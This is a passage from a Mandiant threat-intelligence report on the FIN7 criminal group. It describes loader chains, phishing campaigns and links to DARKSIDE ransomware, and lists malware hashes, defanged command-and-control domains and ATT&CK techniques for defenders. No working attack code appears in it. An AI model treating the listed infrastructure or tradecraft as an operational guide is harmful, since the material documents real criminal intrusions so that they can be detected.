payload embedded in it. The payload is then mapped into memory and executed.
STONEBOAT was observed first loading an intermediary loader called DAVESHELL,
which then executed the final DICELOADER payload. DAVESHELL is publicly
available, open-source code for a launcher of embedded payloads. DAVESHELL is
used by nearly 30 threat groups including FIN12; however, the implementation of
DAVESHELL shellcode loading DICELOADER was unique to a small cluster of threat
activity.
Additionally, we’ve identified multiple phishing campaigns distributing
BIRDWATCH that have leveraged compromised accounts on various email delivery and
marketing platforms, including Maropost, ActiveCampaign, and Mailjet. We
attribute this activity to UNC3381, which is suspected to be FIN7 with low
confidence. UNC3381 was first observed in September 2021, but we’ve identified
similar activity leveraging Mailjet dating back to late 2019, suspected to be
UNC3381 with high confidence.
Throughout their campaigns, UNC3381 has used nearly identical Quickbooks-themed
invoice lures and leveraged the branding of the compromised account that they
were sent from, providing additional legitimacy for their phishes. These emails
contained a malicious link that goes through the analytics domain associated
with the platform they were sent from, before redirecting to a page typically
hosted on a compromised domain.
Figure 25: UNC3381 Quickbooks-themed phishing email
UNC3381 has used multiple malware families in these campaigns, including
WINGNIGHT and FLYHIGH, two different downloader families which we’ve only
observed being used by UNC3381. WINGNIGHT is a WSF-based downloader that
utilizes VBScript, and FLYHIGH is a downloader written in C using the Excel XLL
SDK, but masquerades as using the Excel-DNA framework. In these campaigns, we
observed both WINGNIGHT and FLYHIGH leading to BIRDWATCH, often leveraging
additional compromised domains for both the download server and the BIRDWATCH C2
controller. We’ve observed limited overlaps between UNC3381 and FIN7
infrastructure as well, including the use of the same DNS provider and AS.
FIN7 AND RANSOMWARE
Mandiant published finished intelligence in 2020 which outlined evidence of
FIN7’s possible shift in monetization of intrusions from payment card data to
extortion operations. Although FIN7’s operations have shifted substantially
when compared to their older activity, as of publishing this report, Mandiant
has not attributed any direct deployment of ransomware to FIN7. However, the
possibility that FIN7 actors are engaging in ransomware operations is also
substantiated by evidence outside of our intrusion data holdings and includes
code usage, actor infrastructure, and trusted third party sources.
In at least two incident response engagements in 2020, FIN7 intrusion operations
were identified prior to ransomware encryption, including the use of MAZE and
RYUK. Similarly in 2021, Mandiant attributed active FIN7 intrusion activity
during an incident response engagement involving ALPHV ransomware. In all these
cases, the ransomware deployment is currently attributed to separately tracked
threat groups due to factors of the investigation and our visibility.
In addition to evidence produced from intrusion data, secondary artifacts
suggest FIN7 played a role in at least some DARKSIDE operations. A low global
prevalence code signing certificate used by FIN7 in 2021 to sign BEACON and
BEAKDROP samples was also used to sign multiple unattributed DARKSIDE samples
recovered in the wild (Table 3). The specific mentioned code signing certificate
used by FIN7 contained the SSL subject common name of “OASIS COURT LIMITED”
(Figure 26).
Figure 26: Code signing certificate used by FIN7, also used to sign multiple
DARKSIDE ransomware samples
Serial Number:
e4:e7:95:fd:1f:d2:55:95:b8:69:ce:22:aa:7d:c4:9f
Signature Algorithm: sha256WithRSAEncryption
Issuer: C = GB, ST = Greater Manchester, L = Salford, O = Sectigo
Limited, CN = Sectigo RSA Code Signing CA
Validity
Not Before: Dec 21 00:00:00 2020 GMT
Not After : Dec 21 23:59:59 2021 GMT
Subject: C = GB, postalCode = CO3 9FA, ST = Essex, L = Colchester,
street = 10 Stoneleigh Park, O = OASIS COURT LIMITED, CN = OASIS COURT LIMITED
Table 3: Files signed with code certificate
File MD5
Note
ab29b9e225a05bd17e919e1d0587289e
DNS BEACON
1c3b19163a3b15b39ae00bbe131b499a
DARKSIDE
230a681ebbcdba7ae2175f159394d044
DARKSIDE
bf41fc54f96d0106d34f1c48827006e4
DARKSIDE
c4da0137cbb99626fd44da707ae1bca8
DARKSIDE
28e9581ab34297b6e5f817f93281ffac
FIN7 BEACON
38786bc9de1f447d0187607eaae63f11
FIN7 BEACON
6fba605c2a02fc62e6ff1fb8e932a935
FIN7 BEAKDROP
CONCLUSION
Despite indictments of members of FIN7 in 2018 and a related sentencing in 2021
announced by the U.S. Department of Justice, at least some members of FIN7 have
remained active and continue to evolve their criminal operations over time.
Throughout their evolution, FIN7 has increased the speed of their operational
tempo, the scope of their targeting, and even possibly their relationships with
other ransomware operations in the cybercriminal underground.
ACKNOWLEDGEMENTS
Thank you to Van Ta, Rufus Brown, Dan Perez, Barry Vengerik, Kimberly Goody and
Andrew Thompson for a technical review of this content and FIN7 research
involved behind-the-scenes. In addition, thank you to all Mandiant Incident
Response and Managed Defense responders for harvesting the valuable intrusion
data that enables our research.
INDICATORS OF COMPROMISE (IOCS)
Indicator
Notes
0c6b41d25214f04abf9770a7bdfcee5d
BOATLAUNCH 32bit
21f153810b82852074f0f0f19c0b3208
BOATLAUNCH 64bit
02699f95f8568f52a00c6d0551be2de5
POWERPLANT
0291df4f7303775225c4044c8f054360
POWERPLANT
0fde02d159c4cd5bf721410ea9e72ee2
POWERPLANT
2cbb015d4c579e464d157faa16994f86
POWERPLANT
3803c82c1b2e28e3e6cca3ca73e6cce7
POWERPLANT
5a6bbcc1e44d3a612222df5238f5e7a8
POWERPLANT
833ae560a2347d5daf05d1f670a40c54
POWERPLANT
b637d33dbb951e7ad7fa198cbc9f78bc
POWERPLANT
bce9b919fa97e2429d14f255acfb18b4
POWERPLANT
d1d8902b499b5938404f8cece2918d3d
POWERPLANT
edb1f62230123abf88231fc1a7190b60
POWERPLANT
findoutcredit[.]com
POWERPLANT C2
againcome[.]com
POWERPLANT C2
modestoobgyn[.]com
POWERPLANT C2
myshortbio[.]com
POWERPLANT C2
estetictrance[.]com
POWERPLANT C2
internethabit[.]com
POWERPLANT C2
bestsecure2020[.]com
POWERPLANT C2
chyprediction[.]com
POWERPLANT C2
d405909fd2fd021372444b7b36a3b806
POWERTRASH Cryptor & CARBANAK Payload
122cb55f1352b9a1aeafc83a85bfb165
CROWVIEW (BIRDWATCH/JssLoader Variant)
domenuscdm[.]com
CROWVIEW/LOADOUT C2
936b142d1045802c810e86553b332d2d
LOADOUT
23e1725769e99341bc9af48a0df64151
LOADOUT
4d56a1ca28d9427c440ec41b4969caa2
LOADOUT
50260f97ac2365cf0071e7c798b9edda
LOADOUT
spontaneousance[.]com
LOADOUT C2
fashionableeder[.]com
LOADOUT C2
incongruousance[.]com
LOADOUT C2
electroncador[.]com
LOADOUT C2
6fba605c2a02fc62e6ff1fb8e932a935
BEAKDROP
49ac220edf6d48680f763465c4c2771e
BEACON
astara20[.]com
BEACON C2
coincidencious[.]com
BEACON C2
52f5fcaf4260cb70e8d8c6076dcd0157
Trojanized installer containing Atera Agent
78c828b515e676cc0d021e229318aeb6
WINGNIGHT
70bf088f2815a61ad2b1cc9d6e119a7f
WINGNIGHT
4961aec62fac8beeafffa5bfc841fab8
FLYHIGH
MANDIANT SECURITY VALIDATION ACTIONS
Organizations can validate their security controls against more than 25 actions
with Mandiant Security Validation.
VID
Name
A150-527
Command and Control - FIN7, BATELEUR, Check-in
A150-528
Command and Control - FIN7, GRIFFON, Check-in
A151-165
Command and Control - FIN7, GRIFFON, DNS Query #1
A151-166
Command and Control - FIN7, GRIFFON, DNS Query #2
A104-585
Host CLI - FIN7, Local Javascript Execution via WMI and Mshta
A150-546
Malicious File Transfer - FIN7, CARBANAK, Download, Variant #1
A150-548
Malicious File Transfer - FIN7, CARBANAK, Download, Variant #3
A150-710
Malicious File Transfer - FIN7, DICELOADER, Download, Variant #1
A150-549
Malicious File Transfer - FIN7, DRIFTPIN, Download, Variant #1
A150-550
Malicious File Transfer - FIN7, DRIFTPIN, Download, Variant #2
A151-168
Malicious File Transfer - FIN7, GRIFFON, Download, JavaScript Variant
A150-553
Malicious File Transfer - FIN7, GRIFFON, Download, Variant #1
A150-554
Malicious File Transfer - FIN7, GRIFFON, Download, Variant #2
A150-555
Malicious File Transfer - FIN7, GRIFFON, Download, Variant #3
A150-572
Malicious File Transfer - FIN7, SUPERSOFT, Download, Variant #1
A150-729
Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #1
A150-730
Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #2
A150-731
Malicious File Transfer - FIN7, TAKEOUT, Download, Variant #3
A150-585
Phishing Email - Malicious Attachment, FIN7, BATELEUR DOC Lure
A150-586
Phishing Email - Malicious Attachment, FIN7, GRIFFON DOCM Lure
A151-167
Phishing Email - Malicious Attachment, FIN7, GRIFFON, Windows 11 Themed Lure
A150-587
Phishing Email - Malicious Attachment, FIN7, Tracking Pixel
A150-590
Protected Theater - FIN7, BATELEUR, Execution
A151-044
Protected Theater - FIN7, CARBANAK, Execution
A150-366
Protected Theater - FIN7, CULTSWAP, Execution
A150-591
Protected Theater - FIN7, GRIFFON, Execution
A151-170
Protected Theater - FIN7, GRIFFON, Execution, JavaScript Variant
A151-169
Protected Theater - FIN7, GRIFFON, Execution, Word Document Variant
MITRE ATT&CK MAPPING
Throughout 2020 and 2021, Mandiant has observed FIN7 use the following
techniques:
EXECUTION
* T1059: Command and Scripting Interpreter
* T1059.001: PowerShell
* T1059.003: Windows Command Shell
* T1059.005: Visual Basic
* T1059.007: JavaScript
* T1204.001: Malicious Link
* T1204.002: Malicious File
* T1569.002: Service Execution
INITIAL ACCESS
* T1195.002: Compromise Software Supply Chain
* T1199: Trusted Relationship
* T1566.001: Spearphishing Attachment
* T1566.002: Spearphishing Link
IMPACT
* T1491.002: External Defacement
RESOURCE DEVELOPMENT
* T1583.003: Virtual Private Server
* T1588.003: Code Signing Certificates
* T1588.004: Digital Certificates
* T1608.003: Install Digital Certificate
* T1608.005: Link Target
DEFENSE EVASION
* T1027: Obfuscated Files or Information
* T1027.005: Indicator Removal from Tools
* T1036: Masquerading
* T1036.003: Rename System Utilities
* T1055: Process Injection
* T1070.004: File Deletion
* T1140: Deobfuscate/Decode Files or Information
* T1218.010: Regsvr32
* T1218.011: Rundll32
* T1497.001: System Checks
* T1553.002: Code Signing
* T1564.003: Hidden Window
* T1620: Reflective Code Loading
COLLECTION
* T1113: Screen Capture
* T1213: Data from Information Repositories
* T1560: Archive Collected Data
LATERAL MOVEMENT
* T1021.001: Remote Desktop Protocol
* T1021.004: SSH
COMMAND AND CONTROL
* T1071.001: Web Protocols
* T1090: Proxy
* T1095: Non-Application Layer Protocol
* T1105: Ingress Tool Transfer
* T1132.001: Standard Encoding
* T1573.002: Asymmetric Cryptography
DISCOVERY
* T1012: Query Registry
* T1033: System Owner/User Discovery
* T1057: Process Discovery
* T1069: Permission Groups Discovery
* T1069.002: Domain Groups
* T1082: System Information Discovery
* T1083: File and Directory Discovery
* T1087: Account Discovery
* T1087.002: Domain Account
* T1482: Domain Trust Discovery
* T1518: Software Discovery
CREDENTIAL ACCESS
* T1110.002: Password Cracking
* T1555.003: Credentials from Web Browsers
* T1558.003: Kerberoasting
your cybersecurity advantage
FOOTER
* Customers
* Support
* Community
* Partners
* Mandiant Partners
* Service Partners
* Cyber Risk Partners
* Technology Partners
* Partner Portal
* Company
* About Mandiant
* Media Center
* Careers
* Products and Services
* Advantage Platform
* Managed Defense
* Mandiant Services
* Mandiant Academy
* Connect with Mandiant
* Contact Us
* Report an Incident
* Email Preferences
Follow Mandiant
*
*
*
*
SOCIAL MENU
© Copyright 2022 Mandiant. All rights reserved.
BOTTOM
* Privacy & Cookies Policy
* Terms & Conditions
* Compliance
* Site Map
WIR SCHÄTZEN IHRE PRIVATSPHÄRE SEHR
Diese Website nutzt Cookies und verwandte Technologien gemäß der Beschreibung in
unserer Datenschutzrichtlinie zu Zwecken, zu denen unter anderem der Betrieb der
Website, Analyse, verbessertes Nutzererlebnis und Werbung zählen. Sie können
unserer Nutzung dieser Technologien zustimmen oder Ihre eigenen Präferenzen
verwalten.
AUSWAHL VERWALTEN ZUSTIMMEN UND FORTFAHREN ALLE ABLEHNEN
Datenschutzerklärung
Powered by:
Cookie-Präferenzen